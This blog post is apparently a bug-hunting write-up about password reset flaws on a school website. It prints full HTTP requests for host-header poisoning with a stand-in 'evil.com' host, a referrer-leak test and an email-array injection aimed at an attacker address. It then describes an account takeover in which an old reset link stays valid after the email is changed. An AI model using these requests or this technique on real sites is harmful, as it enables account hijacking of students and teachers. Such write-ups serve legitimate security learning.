top of page
Writer's pictureNitin Yadav

How I Gained Account Access: Exploring the Risks of Password Reset Links in Cybersecurity

Hello everyone, I hope you all are doing great.

I am back with another writeup.


So today we are going to talk about another bug that we found on the same website which we talked about in the last blog. If you haven't read the blog Click Here.



So in the last blog, we got the information about the details of students and teachers through broken authentication. So now we will talk about another bug That we found on the same website which is Account Takeover Due to Password Reset.


The website has a reset password Function where a Teacher or a student can reset their password.



Now, If we reset our password we get a password reset link on the email that is registered with the ID. And through that password link, we can reset our password.


I tried many attacks which I know on forgot password page. So let's talk about them one by one.


Token Leakage Via Host Header Poisoning

While resetting the password I modified the host header of the request to our controlled domain.


POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=

In my case, It doesn't work but if it works for you then you will receive a link that is formed with the host header, this instead links to the attacker’s website. When the target visits this site, their password reset token is sent to the attacker. The attacker now resets the target’s password using their password reset token.


Password Reset Token Leak Via Referrer

The HTTP referer is an optional HTTP header field that identifies the address of the webpage that is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed.

POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=

How You Can Exploit This


Request the password reset to your email address and then click on the password reset link. You will notice 3rd party websites (like Facebook or Twitter)



Intercept the request in the burp proxy and check if the referer header is leaking the password reset token.


But in my case, it isn't working. So I moved to the next one.


Sending an array of email addresses


Then I tried to send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address.


POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5B&email%5D=victim%40gmail.com&email%5D=attacker%40gmail.com&button=

This also didn't work for me.


And at that moment I was like what is happening so I took a break from hunting.


So after some time I got back I thought of trying once again because we haven't found any bug on password reset so we need to find some.


So then I reset a password for a teacher where we get a password reset link but don't use that.


Now logged in again using the teacher ID and then changed the mail address(mail1) for that teacher to another email(mail2). After that, a verification mail is sent to that email address(mail2). so I successfully verified my email(mail2).


So now that the teacher's account is linked to my new mail(mail2) there is no connection between the last mail(mail1) and this account and only I can change my password using my new mail address(mail2).


And after this, the password reset link sent to my old mail address(mail1) should not work.


but to my surprise, the password reset link was working and I was able to change the teacher's password with the link sent to old mail(mail1).


With this, we were able to successfully take over the teacher's account.


I hope you enjoy this one and learned something new.


 I see you next time 😉



Take care, happy hacking!

102 views0 comments

Comments


bottom of page